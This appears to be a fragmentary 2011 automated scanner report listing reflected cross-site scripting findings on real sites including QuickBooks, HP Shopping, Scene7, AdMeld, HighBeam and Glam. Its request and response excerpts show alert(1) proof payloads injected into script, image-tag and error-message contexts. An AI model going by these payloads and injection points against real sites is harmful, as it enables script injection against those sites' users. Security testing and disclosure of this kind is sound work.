HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:21:29 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=quickbooks.intuit x-wily-info: Clear guid=D9389D6A0A08058 x-wily-servlet: Clear appServerIp= Vary: Accept-Encoding Content-Type: text/html;charset=ISO Content-Length: 78187 ...[SNIP]... <script type="text/javascript"> mboxCreate("qb_category </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://quickbooks.intuit |
Path: | /product/add-ons/checks |
GET /product/add-ons/checks Host: quickbooks.intuit.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:21:39 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=4899600000; Domain=quickbooks.intuit Set-Cookie: Sgmt=default; Domain=quickbooks.intuit x-wily-info: Clear guid=D938C3520A08058 x-wily-servlet: Clear appServerIp= Content-Type: text/html;charset=ISO Content-Length: 58367 ...[SNIP]... mboxCreate("qb_category </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://quickbooksonline |
Path: | /bookkeeping-accounting |
GET /bookkeeping-accounting Host: quickbooksonline.intuit Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:21:37 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=qbo.intuit.com; Path=/ Set-Cookie: Sgmt=default; Domain=qbo.intuit.com; Path=/ x-wily-info: Clear guid=D938BB4B0A08058 x-wily-servlet: Clear appServerIp= Vary: Accept-Encoding Content-Type: text/html;charset=ISO Content-Length: 71107 ...[SNIP]... <iframe height="1" width="1" frameborder="0" src="http://quickboo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://quickbooksonline |
Path: | /bookkeeping-accounting |
GET /bookkeeping-accounting Host: quickbooksonline.intuit Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:21:33 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=qbo.intuit.com; Path=/ Set-Cookie: Sgmt=default; Domain=qbo.intuit.com; Path=/ x-wily-info: Clear guid=D938AD160A08058 x-wily-servlet: Clear appServerIp= Vary: Accept-Encoding Content-Type: text/html;charset=ISO Content-Length: 71075 ...[SNIP]... mboxCreate("qbo_category </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://quickbooksonline |
Path: | /bookkeeping-accounting |
GET /bookkeeping-accounting Host: quickbooksonline.intuit Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:21:32 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=qbo.intuit.com; Path=/ Set-Cookie: Sgmt=default; Domain=qbo.intuit.com; Path=/ x-wily-info: Clear guid=D938A80D0A08058 x-wily-servlet: Clear appServerIp= Vary: Accept-Encoding Content-Type: text/html;charset=ISO Content-Length: 71145 ...[SNIP]... <iframe height="1" width="1" frameborder="0" src="http://quickboo ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://quickbooksonline |
Path: | /bookkeeping-accounting |
GET /bookkeeping-accounting Host: quickbooksonline.intuit Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:21:30 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=qbo.intuit.com; Path=/ Set-Cookie: Sgmt=default; Domain=qbo.intuit.com; Path=/ x-wily-info: Clear guid=D9389FCA0A08058 x-wily-servlet: Clear appServerIp= Vary: Accept-Encoding Content-Type: text/html;charset=ISO Content-Length: 71097 ...[SNIP]... mboxCreate("qbo_category </script> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://quickbooksonline |
Path: | /bookkeeping-accounting |
GET /bookkeeping-accounting Host: quickbooksonline.intuit Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: INTUIT_SESSIONID |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 16:21:31 GMT Server: Apache X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ] Set-Cookie: SHOPPER_USER_ID Set-Cookie: priorityCode=0273400000; Domain=qbo.intuit.com; Path=/ Set-Cookie: Sgmt=default; Domain=qbo.intuit.com; Path=/ x-wily-info: Clear guid=D938A3200A08058 x-wily-servlet: Clear appServerIp= Vary: Accept-Encoding Content-Type: text/html;charset=ISO Content-Length: 71101 ...[SNIP]... <script type="text/javascript"> var cookiePrefixName = 'qbn.'; var qboScCookie = 'QBC-V51-SUF-HMEPGE7c45c';alert(1)/ if (qboScCookie.length > ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d2.scene7.com |
Path: | /is/image/HPShopping |
GET /is/image/HPShopping Host: s7d2.scene7.com Proxy-Connection: keep-alive Referer: http://s7d2.scene7.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 84 Expires: Mon, 21 Mar 2011 15:50:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 21 Mar 2011 15:50:40 GMT Connection: close X-N: S Unable to find /HPShopping/xx096av_01_103fdea<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d2.scene7.com |
Path: | /is/image/HPShopping |
GET /is/image/HPShopping Host: s7d2.scene7.com Proxy-Connection: keep-alive Referer: http://s7d2.scene7.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 84 Expires: Mon, 21 Mar 2011 15:50:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 21 Mar 2011 15:50:45 GMT Connection: close X-N: S Unable to find /HPShopping/xx096av_03_10b1bf3<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d2.scene7.com |
Path: | /is/image/HPShopping |
GET /is/image/HPShopping Host: s7d2.scene7.com Proxy-Connection: keep-alive Referer: http://s7d2.scene7.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 84 Expires: Mon, 21 Mar 2011 15:50:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 21 Mar 2011 15:50:45 GMT Connection: close X-N: S Unable to find /HPShopping/xx096av_05_30b42b0<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | http://s7d2.scene7.com |
Path: | /is/image/HPShopping |
GET /is/image/HPShopping Host: s7d2.scene7.com Proxy-Connection: keep-alive Referer: http://s7d2.scene7.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 403 Forbidden Server: Apache-Coyote/1.1 Content-Type: text/plain Content-Length: 84 Expires: Mon, 21 Mar 2011 15:50:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 21 Mar 2011 15:50:40 GMT Connection: close X-N: S Unable to find /HPShopping/xx096av_06_107da94<img src=a onerror=alert(1) |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.admeld.com |
Path: | /ad/json/100/glamtoptier |
GET /ad/json/100/glamtoptier Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: meld_sess=63e2c778-f3e1 |
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: eyB0eXBlOiAgICAgICAg Content-Length: 367 Content-Type: application/javascript Date: Mon, 21 Mar 2011 16:42:19 GMT Connection: close GlamAdmeldRenderJsAd6abe0<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://tag.admeld.com |
Path: | /ad/json/100/glamtoptier |
GET /ad/json/100/glamtoptier Host: tag.admeld.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: meld_sess=63e2c778-f3e1 |
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://tag Pragma: no-cache Cache-Control: no-store Expires: Mon, 26 Jul 1997 05:00:00 GMT X-AdMeld-Debug: eyB0eXBlOiAgICAgICAg Content-Length: 367 Content-Type: application/javascript Date: Mon, 21 Mar 2011 16:42:19 GMT Connection: close GlamAdmeldRenderJsAd({"ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.highbeam.com |
Path: | /ControlLoader.aspx |
POST /ControlLoader.aspx Host: www.highbeam.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com Origin: http://www.highbeam.com X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/xml Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId Content-Length: 0 |
HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 max-age: 0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 21 Mar 2011 16:41:31 GMT Content-Length: 126 Sorry, your control (Malt.ascx4eaa5<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://www.highbeam.com |
Path: | /iframead/display.aspx |
GET /iframead/display.aspx Host: www.highbeam.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 21 Mar 2011 16:41:21 GMT Vary: Accept-Encoding, User-Agent Connection: Keep-Alive Content-Length: 1390 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title></title> ...[SNIP]... <![CDATA[*//*---->*/ //fix iframe height $(window).load(function() { var frame = parent.document if (document.body.offse frame.height = document.body.offset if (document.body.scrol frame.height = document.body. ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.highbeam.com |
Path: | /iframead/display.aspx |
GET /iframead/display.aspx Host: www.highbeam.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 21 Mar 2011 16:41:19 GMT Vary: Accept-Encoding, User-Agent Connection: Keep-Alive Content-Length: 1503 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title></title> ...[SNIP]... <script src="http://ad.doubl ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.highbeam.com |
Path: | /iframead/display.aspx |
GET /iframead/display.aspx Host: www.highbeam.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNetMvc-Version: 2.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 21 Mar 2011 16:41:12 GMT Vary: Accept-Encoding, User-Agent Connection: Keep-Alive Content-Length: 1503 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title></title> ...[SNIP]... <script src="http://ad.doubl ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.shopping.hp |
Path: | /webapp/shopping/computer |
GET /webapp/shopping/computer Host: www.shopping.hp.com Proxy-Connection: keep-alive Referer: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: hpcssprint15ab=0; hptest20110224a |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 15:51:42 GMT Server: Apache/2.0.59 HP-UX_Apache-based_Web Cache-Control: private Set-Cookie: hpshopping=1&user_id=0 Set-Cookie: hpcompc_usen=cartExists X-Powered-By: Servlet/2.4 JSP/2.0 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 241821 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head> <!-- ...[SNIP]... <script language="JavaScript"> checkTab(); var s_prop4 = 'in_R329_prodexp/hhoslp var s_prop21 = 'null|desktops|HPE590t /* Script added to introduce New Omniture Variables */ // PVCS Fix #23259 - omni_v1 was replaced ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.shopping.hp |
Path: | /webapp/shopping/cto.do |
GET /webapp/shopping/cto.do Host: www.shopping.hp.com Proxy-Connection: keep-alive Referer: http://www.shopping.hp Cache-Control: max-age=0 Origin: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: hpcssprint15ab=0; hptest20110224a |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 15:51:48 GMT Server: Apache/2.0.59 HP-UX_Apache-based_Web Cache-Control: private Set-Cookie: HHOJSID=0ncwNH0J2TCg Set-Cookie: hpcompc_usen=cartExists X-Powered-By: Servlet/2.4 JSP/2.0 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 186936 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head> <style type="te ...[SNIP]... <a href='http://www.shopping ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.shopping.hp |
Path: | /webapp/shopping/cto.do |
POST /webapp/shopping/cto.do HTTP/1.1 Host: www.shopping.hp.com Proxy-Connection: keep-alive Referer: http://www.shopping.hp Cache-Control: max-age=0 Origin: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: hpcssprint15ab=0; hptest20110224a Content-Length: 247 destination=components ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 15:51:31 GMT Server: Apache/2.0.59 HP-UX_Apache-based_Web Cache-Control: private Set-Cookie: hpcompc_usen=cartExists X-Powered-By: Servlet/2.4 JSP/2.0 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 187019 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head> <style type="te ...[SNIP]... <a href="javascript:openWin( ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.shopping.hp |
Path: | /webapp/shopping/cto.do |
POST /webapp/shopping/cto.do HTTP/1.1 Host: www.shopping.hp.com Proxy-Connection: keep-alive Referer: http://www.shopping.hp Cache-Control: max-age=0 Origin: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: hpcssprint15ab=0; hptest20110224a Content-Length: 247 destination=components ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 15:51:34 GMT Server: Apache/2.0.59 HP-UX_Apache-based_Web Cache-Control: private Set-Cookie: hpshopping=1&user_id=0 Set-Cookie: hpcompc_usen=cartExists X-Powered-By: Servlet/2.4 JSP/2.0 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 197933 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head> <style type="te ...[SNIP]... yId('save_msg').innerHTML = msg; return true; } params += "fromEmailAddress=" + fromEmailAddress.value + "&"; params += "ctoDescription=" + ctoDescription.value + "&" ; params += "eppPrefix=36c6b";d8180e6df4c&"; params += "catpath=desktops/HPE590t params += "productId=XX096AV%23ABA" cto_user_id = fromEmailAddress.value; //alert("with Params: " + params); SendHttpRequest('save ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.shopping.hp |
Path: | /webapp/shopping/cto.do |
POST /webapp/shopping/cto.do HTTP/1.1 Host: www.shopping.hp.com Proxy-Connection: keep-alive Referer: http://www.shopping.hp Cache-Control: max-age=0 Origin: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: hpcssprint15ab=0; hptest20110224a Content-Length: 247 destination=components ...[SNIP]... |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 15:51:36 GMT Server: Apache/2.0.59 HP-UX_Apache-based_Web Cache-Control: private Set-Cookie: hpshopping=1&user_id=0 Set-Cookie: hpcompc_usen=cartExists X-Powered-By: Servlet/2.4 JSP/2.0 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 198164 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head> <style type="te ...[SNIP]... ew Array(); var selectionList = new Array(); var timeOutURL = 'http://www.shopping.hp var helpmeDecideWindowObj = null; //BA-Q3: variables declaration var eppPrefix = '5be67';2f93dc1bf10'; var s_prop32 = ''; var s_prop33 = ''; var s_eVar32 = ''; var s_eVar33 = ''; var s_eVar34 = ''; var s_events = ''; var s_products = ''; var confType = ''; var isMainSite = false; var sentInitConfigF ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.shopping.hp |
Path: | /webapp/shopping/series |
GET /webapp/shopping/series Host: www.shopping.hp.com Proxy-Connection: keep-alive Referer: http://www.shopping.hp User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: hpcssprint15ab=0; hptest20110224a |
HTTP/1.1 200 OK Date: Mon, 21 Mar 2011 15:51:03 GMT Server: Apache/2.0.59 HP-UX_Apache-based_Web Cache-Control: private Set-Cookie: hpcompc_usen=cartExists X-Powered-By: Servlet/2.4 JSP/2.0 Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 216546 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en"> <head> <!-- ...[SNIP]... (omni_v1)) omni_v1 = 'none'; var s_prop21 = '|' + omni_category + '|' + omni_catLevel + '|' + omni_subcat1; var s_prop4 = 'in_R329_prodexp/hhoslp var s_channel = omni_landing; var s_prop25 = omni_landing + ':' + omni_v1; var s_pageName = 'hho:gs:landing:series:' + omni_landing + ':' + omni_v1; if (s_pageName != null) s_pag ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www2.glam.com |
Path: | /app/site/affiliate |
GET /app/site/affiliate Host: www2.glam.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11266129786 |
HTTP/1.1 200 OK Server: Apache/2.2.3 (CentOS) Content-Type: application/x-javascript Set-Cookie: bkpix2=1; expires=Mon, 21 Mar 2011 22:15:28 GMT; path=/; domain=.glam.com; X-Powered-By: PHP/5.1.6 P3P: policyref="http://www Vary: Accept-Encoding Cache-Control: max-age=450 Date: Mon, 21 Mar 2011 16:42:08 GMT Connection: close Content-Length: 55382 // <!-- [gnetGeneratedTime]=[Mon Mar 21 2011 9:38:14 PDT] --> // <!-- [gnetCachedTime]=[Mon Mar 21 2011 9:42:08 PDT] --> window.glam_session = new Object(); window.glam_session ...[SNIP]... i.com/site/2312" height="0" width="0" border="0">'); function GlamProcessScriptParams() { } window.glam_affiliate_id = '1621082087'; window.glam_zone = ''; window.glam_ad_size = '300x250f6d98';alert(1)/ window.glam_status = ''; window.glam_status = (window.glam_status=='' /* */ function GlamShowCustomDefaultAd window.glam_affiliate ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
GET /gad/glamadapt_jsrv.act? Host: www35.glam.com Proxy-Connection: keep-alive Referer: http://www.highbeam.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: glam_sid=11266129786 |
HTTP/1.1 200 OK Server: Apache Content-Type: application/x-javascript ETag: "d9a61c18c39e371e68f X-Glam-Bdata: XGlamBData,nbt,lda,ln X-Glam-AdId: 5000025383 X-Glam-Euid: 7c58f7d28c0f13f55244 X-Powered-By: GlamAdapt/ASE/1.5 Vary: Accept-Encoding Expires: Mon, 21 Mar 2011 16:42:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Mon, 21 Mar 2011 16:42:09 GMT Connection: close Content-Length: 10016 ...[SNIP]... 12sa,g10001s;sz=300x250 var vars = glam_affiliate_vars.split for (var i=0;i<vars.length;i++) { var pair = vars[i].split("="); if ( pair[1] ) { glam_info[pair[0]] = pair[1]; } } return ( glam_info[pName ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www35.glam.com |
Path: | /gad/glamadapt_jsrv.act |
